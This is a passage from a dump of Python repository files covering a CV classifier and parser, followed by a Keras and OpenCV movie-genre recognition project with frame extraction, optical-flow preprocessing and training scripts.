"content_id": "e417f6df91e91a1758f17f4106b5478865d0b54e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1497,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 45,
"path": "/cvClassifier/Classifier.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from textblob.classifiers import NaiveBayesClassifier\nfrom nltk.corpus import stopwords\nimport pickle\nimport os\n# download nltk corpus: python -m textblob.download_corpora\n\n__author__ = 'siwei'\n\nclass Classifier:\n def __init__(self):\n self.cachedStopWords = stopwords.words(\"english\")\n self.path = os.path.dirname(os.path.abspath(__file__))\n\n def train(self, train_set):\n train_data = []\n for t in train_set:\n train_data.append((self._cvobj_to_string(t[0]),t[1]))\n print \"Training model...\"\n #print train_data\n self.cl = NaiveBayesClassifier(train_data)\n #print self._cvobj_to_string(train_set[0][0])\n\n def _cvobj_to_string(self, cv):\n str = \"\"\n for exp in cv['experience']:\n str += (exp['description']+\" \")\n for proj in cv['project']:\n str += (proj['title']+\" \")\n str += (proj['description']+\" \")\n for skill in cv['skill']:\n str += (skill+\" \")\n str = str.decode(\"utf-8\", \"replace\")\n str = ' '.join([word for word in str.split() if word not in self.cachedStopWords])\n return str\n\n def classify(self, cv):\n return self.cl.classify(self._cvobj_to_string(cv))\n\n def save(self):\n pickle.dump( self.cl, open( self.path+\"/cv_model.cvm\", \"wb\" ) )\n print \"CV classifier saved.\"\n\n def load(self):\n self.cl = pickle.load( open( self.path+\"/cv_model.cvm\", \"rb\" ) )\n print \"CV classifier loaded.\""
},
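Classifier flattens a parsed CV (experience descriptions, project text, skills, minus English stopwords) into one labelled string and hands those pairs to textblob's NaiveBayesClassifier. The underlying textblob calls in isolation; the two training pairs are invented and the predicted label is only likely, not guaranteed:

```python
from textblob.classifiers import NaiveBayesClassifier
# Requires the textblob corpora: python -m textblob.download_corpora

train = [
    ("python flask keras deep learning pipelines", "4"),
    ("accounting audit financial reporting excel", "2"),
]
cl = NaiveBayesClassifier(train)  # list of (text, label) pairs
print(cl.classify("tensorflow model training python"))  # expected: "4"
```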
{
"alpha_fraction": 0.6201117038726807,
"alphanum_fraction": 0.6229050159454346,
"avg_line_length": 22.866666793823242,
"blob_id": "c6085894c467450dc8e2fdf49b1e90d457f4840f",
"content_id": "225189bfbdb18abc2b71fa83d5c1980abbbba8a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 15,
"path": "/cvParser/InterestsParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\n__author__ = 'haojiang'\n\n\n\nclass InterestParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseInterest(self,text):\n textList = text.split(\",\")\n for i in range(0,len(textList)):\n textList[i] = textList[i].strip()\n return self.factory.produce(\"interest\",textList)\n"
}
] | 47 |
Reemr/movie-genre-recognition
|
https://github.com/Reemr/movie-genre-recognition
|
e5c920b774e09424e12194de592308b6c583e7a0
|
2e50db0b0d87159f8e9328c85fbab2409339ed64
|
1cb75f858d09b8b406542566b40264ce9dcd80f3
|
refs/heads/master
| 2020-06-26T17:24:24.558769 | 2019-09-17T20:15:07 | 2019-09-17T20:15:07 | 199,698,624 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6174028515815735,
"alphanum_fraction": 0.6512786746025085,
"avg_line_length": 25.412281036376953,
"blob_id": "883fb74582b7d7fb6dc6c0b0e6a96ef686bd67be",
"content_id": "4d914d6b50124658baad29b4e8c76df7ee909f9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3011,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 114,
"path": "/models.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nfrom keras import layers\nfrom keras import models\nfrom keras import engine\nfrom keras.layers import Input, Conv2D, MaxPooling2D, BatchNormalization, Dense\nfrom keras.layers import Dropout, Flatten, GRU\nfrom keras.models import Model\nfrom keras.layers.merge import Average, Maximum, Add\nfrom keras.applications.resnet50 import ResNet50\n\nCLASSES = 5\nIMG_SIZE = (216,216,3)\nSEQ = 10\nBATCH_SIZE = 28\n\n'''\ndef RNN(in_shape), weights_dir):\n\n input_img = Input(shape=in_shape)\n\n x = GRU(128)(input_img)\n x = Dropout(0.9)(x)\n x = Dense(CLASSES, activation='softmax')(x)\n\n model = Model(inputs=input_img, outputs=x)\n\n\n if os.path.exists(weights_dir):\n model.load_weights(weights_dir)\n\n\n return model\n'''\n\ndef finetuned_resnet(include_top, weights_dir):\n\n base_model = ResNet50(include_top=False, weights='imagenet', input_shape=IMG_SIZE)\n for layer in base_model.layers:\n layer.trainable = False\n\n x = base_model.output\n x = Flatten()(x)\n x = Dense(2048, activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(1024, activation='relu')(x)\n x = Dropout(0.5)(x)\n\n if include_top:\n x = Dense(CLASSES, activation='softmax')(x)\n\n model = Model(inputs=base_model.input, outputs=x)\n if os.path.exists(weights_dir):\n model.load_weights(weights_dir, by_name=True)\n\n return model\n\ndef CNN(in_shape, weights_dir):\n #in_shape = (IMG_SIZE[0],IMG_SIZE[1],3)\n\n input_img = Input(shape=in_shape)\n\n x = Conv2D(96,(7,7), strides=(2,2), padding='same', activation='relu')(input_img)\n x = layers.BatchNormalization()(x)\n x = MaxPooling2D((2,2))(x)\n\n x = Conv2D(256,(5,5), strides=(2,2), padding='same', activation='relu')(x)\n x = BatchNormalization()(x)\n x = MaxPooling2D((2,2))(x)\n\n x = Conv2D(512,(3,3), strides=(1,1), padding='same', activation='relu')(x)\n\n x = Conv2D(512,(3,3), strides=(1,1), padding='same', activation='relu')(x)\n\n x = Conv2D(256,(3,3), strides=(1,1), padding='same', activation='relu')(x)\n x = MaxPooling2D((2,2))(x)\n\n x = layers.Flatten()(x)\n\n x = Dense(4096, activation='relu')(x)\n x = Dropout(0.2)(x)\n\n x = Dense(2048, activation='relu')(x)\n x = Dropout(0.2)(x)\n\n x = Dense(CLASSES, activation='softmax')(x)\n\n model = Model(inputs=input_img, outputs=x)\n\n if os.path.exists(weights_dir):\n model.load_weights(weights_dir)\n\n return model\n\ndef two_stream_model(spatial_weights, temporal_weights):\n\n spatial_stream = finetuned_resnet(include_top=True, weights_dir=spatial_weights)\n\n temporal_stream = CNN(input_shape, temporal_weights)\n\n spatial_output = spatial_stream.output\n temporal_output = temporal_stream.output\n\n fused_output = Average(name='fusion_layer')([spatial_output, temporal_output])\n\n model = Model(inputs=[spatial_stream.input, temporal_stream.input],\n outputs=fused_output, name=two_stream)\n\n return model\n\nif __name__ == '__main__':\n\n sha = (IMG_SIZE[0],IMG_SIZE[1])\n m = CNN(sha)\n print(m.summary())\n"
},
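two_stream_model fuses the two streams late, by averaging their softmax outputs inside the graph. A self-contained sketch of that fusion step with two toy branches; the shapes are arbitrary, and the Average import path shown is the Keras 2 one (older versions expose it under keras.layers.merge):

```python
from keras.layers import Input, Dense, Average
from keras.models import Model

a_in = Input(shape=(32,))
b_in = Input(shape=(64,))
a_out = Dense(5, activation="softmax")(Dense(16, activation="relu")(a_in))
b_out = Dense(5, activation="softmax")(Dense(16, activation="relu")(b_in))

# Late fusion: element-wise mean of the two class-probability vectors
fused = Average(name="fusion_layer")([a_out, b_out])
model = Model(inputs=[a_in, b_in], outputs=fused)
model.summary()
```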
{
"alpha_fraction": 0.6036414504051208,
"alphanum_fraction": 0.6111111044883728,
"avg_line_length": 28.75,
"blob_id": "48278676abd9515bb625d8db3f68e17edc0ffece",
"content_id": "0f98ca755b3be0a088c42402a6631edda0bc0988",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2142,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 72,
"path": "/videoPreprocessing.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nimport cv2\nimport numpy as np\nimport time\nimport shutil\nimport scipy.misc\n\n\ndef extract_frames(src, dst):\n cap = cv2.VideoCapture(src)\n\n while cap.isOpened():\n frame_pos = cap.get(1) #the value 1 gets the frame pos\n succ, frame = cap.read()\n if not succ:\n break\n if frame.any():\n frame_res = cv2.resize(frame, (216,216))\n np.save(dst+'_%d'%frame_pos, frame_res)\n\n cap.release()\n\ndef get_list_videos(list_dir,txt):\n txt_path = os.path.join(list_dir, txt)\n\n with open(txt_path) as files:\n datalist = [file for file in files]\n\n return datalist\n\ndef process_videos(list_dir, movie_dir, dest_dir, txt, train_test_dir):\n\n if not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\n\n\n datalist = get_list_videos(list_dir, txt)\n\n sub_dir = os.path.join(dest_dir, train_test_dir)\n\n if not os.path.exists(sub_dir):\n os.mkdir(sub_dir)\n\n start_time = time.time()\n print(\"Extracting frames...\")\n for i, clip in enumerate(datalist):\n clip_name = os.path.basename(clip)\n clip_categ = os.path.dirname(clip)\n categ_dir = os.path.join(sub_dir, clip_categ)\n src = os.path.join(movie_dir, clip)\n dst = os.path.join(categ_dir, os.path.splitext(clip_name)[0])\n if not os.path.exists(categ_dir):\n os.mkdir(categ_dir)\n video_time = time.time()\n extract_frames(src, dst)\n vid_elap = time.time() -video_time\n print(\" video\", i, \"time\", vid_elap / 60, 'minutes')\n elapsed_time = time.time()-start_time\n print(\"Total processing time:\", (elapsed_time / 60), 'minutes')\n\nif __name__ == \"__main__\":\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n movie_dir = os.path.join(data_dir, 'Movie-dataset')\n dest_dir = os.path.join(data_dir, 'Movie-dataset-preprocessed')\n train_txt = 'train.txt'\n train = 'train'\n test_txt = 'test.txt'\n test = 'test'\n\n #process_videos(list_dir, movie_dir, dest_dir, train_txt, train)\n #process_videos(list_dir, movie_dir, dest_dir, test_txt, test)\n"
},
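extract_frames saves every frame of a clip to its own .npy file; the models downstream want a fixed-length sequence instead. A sketch of uniformly sampling seq_len frames from a video; the sampling policy is illustrative, only the OpenCV calls are standard:

```python
import cv2
import numpy as np

def sample_frames(path, seq_len=10, size=(216, 216)):
    cap = cv2.VideoCapture(path)
    total = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
    # Pick seq_len roughly evenly spaced frame indices
    picks = set(np.linspace(0, max(total - 1, 0), seq_len, dtype=int))
    frames, index = [], 0
    while cap.isOpened():
        ok, frame = cap.read()
        if not ok:
            break
        if index in picks:
            frames.append(cv2.resize(frame, size))
        index += 1
    cap.release()
    return np.stack(frames) if frames else None
```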
{
"alpha_fraction": 0.6150712966918945,
"alphanum_fraction": 0.6320434212684631,
"avg_line_length": 39.91666793823242,
"blob_id": "26c858c3ecbbff3fe62e9b3a90acc3b25660b9d9",
"content_id": "6e8ace13aee7436a36b5975292b9de0cb003dc0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2946,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 72,
"path": "/training.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nimport keras.callbacks\nfrom generators import seq_generator, img_generator, get_data_list\nfrom models import finetuned_resnet, CNN\nfrom keras.optimizers import SGD\nfrom dataPreprocessing import regenerate_data\n\nCLASSES = 5\nBATCH_SIZE = 20\n\ndef fit_model(model, train_data, test_data, weights_dir, input_shape, optic=False):\n\n try:\n if optic:\n train_generator = seq_generator(train_data, BATCH_SIZE, input_shape, CLASSES)\n test_generator = seq_generator(test_data, BATCH_SIZE, input_shape, CLASSES)\n else:\n train_generator = img_generator(train_data, BATCH_SIZE, input_shape, CLASSES)\n test_generator = img_generator(test_data, BATCH_SIZE, input_shape, CLASSES)\n\n sgd = SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n print(model.summary())\n\n print('Start fitting model')\n\n while True:\n callbacks = [keras.callbacks.ModelCheckpoint(weights_dir, save_best_only=True, save_weights_only=True),\n keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0.001, patience=10, verbose=1, mode='auto'),\n keras.callbacks.TensorBoard(log_dir='.\\\\logs\\\\try', histogram_freq=0, write_graph=True, write_images=True)]\n model.fit_generator(\n train_generator,\n steps_per_epoch=100,\n epochs=30,\n validation_data=test_generator,\n validation_steps=25,\n verbose=1,\n callbacks=callbacks\n )\n print('finished')\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n movie_dir = os.path.join(data_dir, 'Movie-dataset')\n regenerate_data(data_dir, list_dir, movie_dir)\n\n except KeyboardInterrupt:\n print(\"Training is intrrupted!\")\n\n\nif __name__ == '__main__':\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n weights_dir = os.getcwd()\n\n video_dir = os.path.join(data_dir, 'Movie-Preprocessed-OF')\n train_data, test_data, class_index = get_data_list(list_dir, video_dir)\n input_shape = (10, 216, 216, 3)\n weights_dest = os.path.join(weights_dir, 'finetuned_resnet_RGB_65_2.h5')\n model = finetuned_resnet(include_top=True, weights_dir=weights_dest)\n fit_model(model, train_data, test_data, weights_dest, input_shape)\n\n '''\n video_dir = os.path.join(data_dir, 'OF_data')\n weights_dest = os.path.join(weights_dir, 'temporal_cnn_2.h5')\n train_data, test_data, class_index = get_data_list(list_dir, video_dir)\n\n input_shape = (216, 216, 18)\n model = CNN(input_shape, weights_dest)\n fit_model(model, train_data, test_data, weights_dest, input_shape, optic=True)\n '''\n"
},
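fit_generator consumes an endless generator of (batch_x, batch_y) pairs; seq_generator and img_generator from generators.py (not shown in this snapshot) fill that role. A minimal stand-in showing the contract, assuming file_list holds (npy_path, integer_label) tuples with at least batch_size entries and input_shape is a tuple:

```python
import numpy as np
from keras.utils import to_categorical

def dummy_generator(file_list, batch_size, input_shape, num_classes):
    while True:  # Keras pulls steps_per_epoch batches from this loop per epoch
        chosen = np.random.choice(len(file_list), batch_size, replace=False)
        x = np.empty((batch_size,) + input_shape, dtype="float32")
        y = np.empty(batch_size, dtype="int64")
        for i, idx in enumerate(chosen):
            path, label = file_list[idx]
            x[i] = np.load(path)  # a preprocessed clip saved as .npy
            y[i] = label
        yield x, to_categorical(y, num_classes)
```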
{
"alpha_fraction": 0.5826867818832397,
"alphanum_fraction": 0.5926908850669861,
"avg_line_length": 36.38676834106445,
"blob_id": "38249a2e751b85f32a71bbbee1187fbce3d7c9d0",
"content_id": "6a544c357ee2f610539e21125ce616995adab040",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14694,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 393,
"path": "/dataPreprocessing.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "\nimport numpy as np\nimport scipy.misc\nimport os, cv2, random\nimport glob\nimport shutil\nimport time\nimport warnings\nfrom collections import OrderedDict\nimport concurrent.futures\n\n\ndef optical_flow_prep(src_dir, dest_dir, mean_sub=True, overwrite=False):\n train_dir = os.path.join(src_dir, 'train')\n test_dir = os.path.join(src_dir, 'test')\n\n # create dest directory\n if os.path.exists(dest_dir):\n if overwrite:\n shutil.rmtree(dest_dir)\n else:\n raise IOError(dest_dir + ' already exists')\n os.mkdir(dest_dir)\n print(dest_dir, 'created')\n\n # create directory for training data\n dest_train_dir = os.path.join(dest_dir, 'train')\n if os.path.exists(dest_train_dir):\n print(dest_train_dir, 'already exists')\n else:\n os.mkdir(dest_train_dir)\n print(dest_train_dir, 'created')\n\n # create directory for testing data\n dest_test_dir = os.path.join(dest_dir, 'test')\n if os.path.exists(dest_test_dir):\n print(dest_test_dir, 'already exists')\n else:\n os.mkdir(dest_test_dir)\n print(dest_test_dir, 'created')\n\n dir_mapping = OrderedDict(\n [(train_dir, dest_train_dir), (test_dir, dest_test_dir)]) #the mapping between source and dest\n\n print('Start computing optical flows ...')\n for dir, dest_dir in dir_mapping.items():\n print('Processing data in {}'.format(dir))\n for index, class_name in enumerate(os.listdir(dir)): # run through every class of video\n class_dir = os.path.join(dir, class_name)\n dest_class_dir = os.path.join(dest_dir, class_name)\n if not os.path.exists(dest_class_dir):\n os.mkdir(dest_class_dir)\n # print(dest_class_dir, 'created')\n for filename in os.listdir(class_dir): # process videos one by one\n file_dir = os.path.join(class_dir, filename)\n frames = np.load(file_dir)\n # note: store the final processed data with type of float16 to save storage\n processed_data = stack_optical_flow(frames, mean_sub).astype(np.float16)\n dest_file_dir = os.path.join(dest_class_dir, filename)\n np.save(dest_file_dir, processed_data)\n # print('No.{} class {} finished, data saved in {}'.format(index, class_name, dest_class_dir))\n print('Finish computing optical flows')\n\n\n\ndef stack_optical_flow(frames, mean_sub=False):\n if frames.dtype != np.float32:\n frames = frames.astype(np.float32)\n warnings.warn('Warning! The data type has been changed to np.float32 for graylevel conversion...')\n frame_shape = frames.shape[1:-1] # e.g. 
frames.shape is (10, 216, 216, 3)\n num_sequences = frames.shape[0]\n output_shape = frame_shape + (2 * (num_sequences - 1),) # stacked_optical_flow.shape is (216, 216, 18)\n flows = np.ndarray(shape=output_shape)\n\n for i in range(num_sequences - 1):\n prev_frame = frames[i]\n next_frame = frames[i + 1]\n prev_gray = cv2.cvtColor(prev_frame, cv2.COLOR_BGR2GRAY)\n next_gray = cv2.cvtColor(next_frame, cv2.COLOR_BGR2GRAY)\n flow = _calc_optical_flow(prev_gray, next_gray)\n flows[:, :, 2 * i:2 * i + 2] = flow\n\n if mean_sub:\n flows_x = flows[:, :, 0:2 * (num_sequences - 1):2]\n flows_y = flows[:, :, 1:2 * (num_sequences - 1):2]\n mean_x = np.mean(flows_x, axis=2)\n mean_y = np.mean(flows_y, axis=2)\n for i in range(2 * (num_sequences - 1)):\n flows[:, :, i] = flows[:, :, i] - mean_x if i % 2 == 0 else flows[:, :, i] - mean_y\n\n return flows\n\n\ndef _calc_optical_flow(prev, next_):\n flow = cv2.calcOpticalFlowFarneback(prev, next_, flow=None, pyr_scale=0.5, levels=3, winsize=15, iterations=3,\n poly_n=5, poly_sigma=1.2, flags=0)\n return flow\n\n\n\ndef combine_list_txt(list_dir):\n testlisttxt = 'testlist.txt'\n trainlisttxt = 'trainlist.txt'\n\n testlist = []\n txt_path = os.path.join(list_dir, testlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n testlist.append(line[:line.rfind(' ')])\n\n trainlist = []\n txt_path = os.path.join(list_dir, trainlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n trainlist.append(line[:line.rfind(' ')])\n\n return trainlist, testlist\n\n\ndef process_frame(frame, img_size, x, y, mean=None, normalization=True, flip=True, random_crop=True):\n if not random_crop:\n frame = scipy.misc.imresize(frame, img_size)\n else:\n frame = frame[x:x+img_size[0], y:y+img_size[1], :]\n # flip horizontally\n if flip:\n frame = frame[:, ::-1, :]\n frame = frame.astype(dtype='float16')\n if mean is not None:\n frame -= mean\n if normalization:\n frame /= 255\n\n return frame\n\n\ndef process_clip(src_dir, dst_dir, seq_len, img_size, mean=None, normalization=True,\n horizontal_flip=True, random_crop=True, consistent=True, continuous_seq=False):\n all_frames = []\n cap = cv2.VideoCapture(src_dir)\n while cap.isOpened():\n succ, frame = cap.read()\n if not succ:\n break\n # append frame that is not all zeros\n if frame.any():\n all_frames.append(frame)\n # save all frames\n if seq_len is None:\n all_frames = np.stack(all_frames, axis=0)\n dst_dir = os.path.splitext(dst_dir)[0] + '.npy'\n np.save(dst_dir, all_frames)\n else:\n clip_length = len(all_frames)\n if clip_length <= 20:\n print(src_dir, ' has no enough frames')\n step_size = int(clip_length / (seq_len + 1))\n frame_sequence = []\n # select random first frame index for continuous sequence\n if continuous_seq:\n start_index = random.randrange(clip_length-seq_len)\n # choose whether to flip or not for all frames\n if not horizontal_flip:\n flip = False\n elif horizontal_flip and consistent:\n flip = random.randrange(2) == 1\n if not random_crop:\n x, y = None, None\n xy_set = False\n for i in range(seq_len):\n if continuous_seq:\n index = start_index + i\n else:\n index = i*step_size + random.randrange(step_size)\n frame = all_frames[index]\n # compute flip for each frame\n if horizontal_flip and not consistent:\n flip = random.randrange(2) == 1\n if random_crop and consistent and not xy_set:\n x = random.randrange(frame.shape[0]-img_size[0])\n y = random.randrange(frame.shape[1]-img_size[1])\n xy_set = True\n elif random_crop and not consistent:\n x = random.randrange(frame.shape[0]-img_size[0])\n y = 
random.randrange(frame.shape[1]-img_size[1])\n frame = process_frame(frame, img_size, x, y, mean=mean, normalization=normalization,\n flip=flip, random_crop=random_crop)\n frame_sequence.append(frame)\n frame_sequence = np.stack(frame_sequence, axis=0)\n dst_dir = os.path.splitext(dst_dir)[0]+'.npy'\n np.save(dst_dir, frame_sequence)\n\n cap.release()\n\ndef preprocessing(list_dir, movie_dir, dest_dir, seq_len, img_size, overwrite=False, normalization=True,\n mean_subtraction=True, horizontal_flip=True, random_crop=True, consistent=True, continuous_seq=False):\n '''\n Extract video data to sequence of fixed length, and save it in npy file\n :param list_dir:\n :param Movie_dir:\n :param dest_dir:\n :param seq_len:\n :param img_size:\n :param overwrite: whether overwirte dest_dir\n :param normalization: normalize to (0, 1)\n :param mean_subtraction: subtract mean of RGB channels\n :param horizontal_flip: add random noise to sequence data\n :param random_crop: cropping using random location\n :param consistent: whether horizontal flip, random crop is consistent in the sequence\n :param continuous_seq: whether frames extracted are continuous\n :return:\n '''\n if os.path.exists(dest_dir):\n if overwrite:\n shutil.rmtree(dest_dir)\n else:\n raise IOError('Destination directory already exists')\n os.mkdir(dest_dir)\n #trainlist = combine_list_txt(list_dir)\n trainlist, testlist = combine_list_txt(list_dir)\n train_dir = os.path.join(dest_dir, 'train')\n test_dir = os.path.join(dest_dir, 'test')\n os.mkdir(train_dir)\n os.mkdir(test_dir)\n if mean_subtraction:\n mean = calc_mean(movie_dir, img_size).astype(dtype='float16')\n np.save(os.path.join(dest_dir, 'mean.npy'), mean)\n else:\n mean = None\n\n print('Preprocessing Movie data ...')\n for clip_list, sub_dir in [(trainlist, train_dir), (testlist, test_dir)]:\n\n for clip in clip_list:\n clip_name = os.path.basename(clip)\n #print(\"clip name = \" + clip_name)\n clip_category = os.path.dirname(clip)\n #print(\"clip category = \" + clip_category)\n category_dir = os.path.join(sub_dir, clip_category)\n #print(\"sub dir = \" + sub_dir)\n #print(\"category dir = \" + category_dir)\n src_dir = os.path.join(movie_dir, clip)\n #print(\"source = \"+src_dir)\n dst_dir = os.path.join(category_dir, clip_name)\n #print(\"destination = \"+dst_dir)\n #print()\n if not os.path.exists(category_dir):\n os.mkdir(category_dir)\n process_clip(src_dir, dst_dir, seq_len, img_size, mean=mean, normalization=normalization, horizontal_flip=horizontal_flip,\n random_crop=random_crop, consistent=consistent, continuous_seq=continuous_seq)\n\n print('Preprocessing done ...')\n\n\ndef calc_mean(movie_dir, img_size):\n frames = []\n print('Calculating RGB mean ...')\n for dirpath, dirnames, filenames in os.walk(movie_dir):\n for filename in filenames:\n path = os.path.join(dirpath, filename)\n if os.path.exists(path):\n cap = cv2.VideoCapture(path)\n if cap.isOpened():\n ret, frame = cap.read()\n # successful read and frame should not be all zeros\n if ret and frame.any():\n if frame.shape != (240, 320, 3):\n frame = scipy.misc.imresize(frame, (240, 320, 3))\n frames.append(frame)\n cap.release()\n frames = np.stack(frames)\n mean = frames.mean(axis=0, dtype='int64')\n mean = scipy.misc.imresize(mean, img_size)\n print('RGB mean is calculated over', len(frames), 'video frames')\n return mean\n\n\ndef preprocess_flow_image(flow_dir):\n videos = os.listdir(flow_dir)\n for video in videos:\n video_dir = os.path.join(flow_dir, video)\n flow_images = os.listdir(video_dir)\n for 
flow_image in flow_images:\n flow_image_dir = os.path.join(video_dir, flow_image)\n img = scipy.misc.imread(flow_image_dir)\n if np.max(img) < 140 and np.min(img) > 120:\n print('remove', flow_image_dir)\n os.remove(flow_image_dir)\n\n\ndef regenerate_data(data_dir, list_dir, Movie_dir):\n start_time = time.time()\n sequence_length = 10\n image_size = (216, 216, 3)\n\n dest_dir_pre = os.path.join(data_dir, 'Movie-Preprocessed-OF')\n # generate sequence for optical flow\n preprocessing(list_dir, Movie_dir, dest_dir_pre, sequence_length, image_size, overwrite=True, normalization=False,\n mean_subtraction=False, horizontal_flip=False, random_crop=True, consistent=True, continuous_seq=True)\n\n # compute optical flow data\n src_dir = dest_dir_pre\n dest_dir = os.path.join(data_dir, 'OF_data')\n optical_flow_prep(src_dir, dest_dir, mean_sub=True, overwrite=True)\n\n elapsed_time = time.time() - start_time\n print('Regenerating data takes:', int(elapsed_time / 60), 'minutes')\n\n\ndef preprocess_listtxt(list_dir, index, txt, txt_dest):\n\n index_dir = os.path.join(list_dir, index)\n txt_dir = os.path.join(list_dir, txt)\n dest_dir = os.path.join(list_dir, txt_dest)\n\n class_dict = dict()\n with open(index_dir) as fo:\n for line in fo:\n class_index, class_name = line.split()\n class_dict[class_name] = class_index\n #print(class_dict)\n #print()\n with open(txt_dir, 'r') as fo:\n lines = [line for line in fo]\n #print(lines)\n with open(dest_dir, 'w') as fo:\n for line in lines:\n class_name = os.path.dirname(line)\n class_index = class_dict[class_name]\n fo.write(line.rstrip('\\n') + ' {}\\n'.format(class_index))\n\ndef createListFiles(data_dir, src_name, dest_name):\n src_dir = os.path.join(data_dir, src_name)\n dest_dir = os.path.join(data_dir, dest_name )\n\n data_files = os.listdir(src_dir)\n\n classind = {}\n for c, fi in enumerate(data_files):\n classind[fi] = c\n\n if os.path.exists(dest_dir):\n print(\"path already exits\")\n else:\n os.mkdir(dest_dir)\n\n ind = os.path.join(dest_dir, 'index.txt')\n with open(ind, 'w') as f:\n for k, v in classind.items():\n f.write('{}'.format(v) + ' ' + k + '\\n')\n\n train_list = os.path.join(dest_dir, 'train.txt')\n test_list = os.path.join(dest_dir, 'test.txt')\n\n with open(train_list, 'w') as tr, open(test_list, 'w') as ts:\n for fol in classind.keys():\n data_path = os.path.join(src_dir, fol)\n data_list = os.listdir(data_path)\n\n data_list_size = len(data_list)\n div = round(0.8 * data_list_size)\n\n for i, fil in enumerate(data_list):\n file_path = os.path.join(fol, fil)\n #divid the data into train and test\n #the division can be defined here\n if i < div:\n tr.write(file_path + '\\n')\n else:\n ts.write(file_path + '\\n')\n\n\nif __name__ == '__main__':\n\n sequence_length = 10\n image_size = (216, 216, 3)\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n movie_dir = os.path.join(data_dir, 'Movie-dataset')\n\n #frames_dir = os.path.join(data_dir, 'frames\\\\mean.npy')\n\n #createListFiles(data_dir, movie_dir_name, list_name)\n\n # add index number to testlist file\n #index = 'index.txt'\n\n #preprocess_listtxt(list_dir, index, 'train.txt', 'trainlist.txt')\n #preprocess_listtxt(list_dir, index, 'test.txt', 'testlist.txt')\n\n\n\n regenerate_data(data_dir, list_dir, movie_dir)\n"
},
{
"alpha_fraction": 0.5726582407951355,
"alphanum_fraction": 0.5736708641052246,
"avg_line_length": 31.37704849243164,
"blob_id": "cd4751c88c07eb723daf2fcc03501ee98209ba6f",
"content_id": "282cee29040b90378636c7751d9293b701f37920",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3950,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 122,
"path": "/dataOrganizing.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\n\ndef combine_list_txt(list_dir):\n testlisttxt = 'testlist.txt'\n trainlisttxt = 'trainlist.txt'\n\n testlist = []\n txt_path = os.path.join(list_dir, testlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n testlist.append(line[:line.rfind(' ')])\n\n trainlist = []\n txt_path = os.path.join(list_dir, trainlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n trainlist.append(line[:line.rfind(' ')])\n\n return trainlist, testlist\n\ndef preprocess_listtxt(list_dir, index, txt, txt_dest):\n\n index_dir = os.path.join(list_dir, index)\n txt_dir = os.path.join(list_dir, txt)\n dest_dir = os.path.join(list_dir, txt_dest)\n\n class_dict = dict()\n with open(index_dir) as fo:\n for line in fo:\n class_index, class_name = line.split()\n class_dict[class_name] = class_index\n #print(class_dict)\n #print()\n with open(txt_dir, 'r') as fo:\n lines = [line for line in fo]\n #print(lines)\n with open(dest_dir, 'w') as fo:\n for line in lines:\n class_name = os.path.dirname(line)\n class_index = class_dict[class_name]\n fo.write(line.rstrip('\\n') + ' {}\\n'.format(class_index))\n\ndef createListFiles(data_dir, src_name, dest_name):\n src_dir = os.path.join(data_dir, src_name)\n dest_dir = os.path.join(data_dir, dest_name )\n\n data_files = os.listdir(src_dir)\n\n classind = {}\n for c, fi in enumerate(data_files):\n classind[fi] = c\n\n if os.path.exists(dest_dir):\n print(\"path already exits\")\n else:\n os.mkdir(dest_dir)\n\n ind = os.path.join(dest_dir, 'index.txt')\n with open(ind, 'w') as f:\n for k, v in classind.items():\n f.write('{}'.format(v) + ' ' + k + '\\n')\n\n train_list = os.path.join(dest_dir, 'train.txt')\n test_list = os.path.join(dest_dir, 'test.txt')\n\n with open(train_list, 'w') as tr, open(test_list, 'w') as ts:\n for fol in classind.keys():\n data_path = os.path.join(src_dir, fol)\n data_list = os.listdir(data_path)\n\n data_list_size = len(data_list)\n div = round(0.8 * data_list_size)\n\n for i, fil in enumerate(data_list):\n file_path = os.path.join(fol, fil)\n #divid the data into train and test\n #the division can be defined here\n if i < div:\n tr.write(file_path + '\\n')\n else:\n 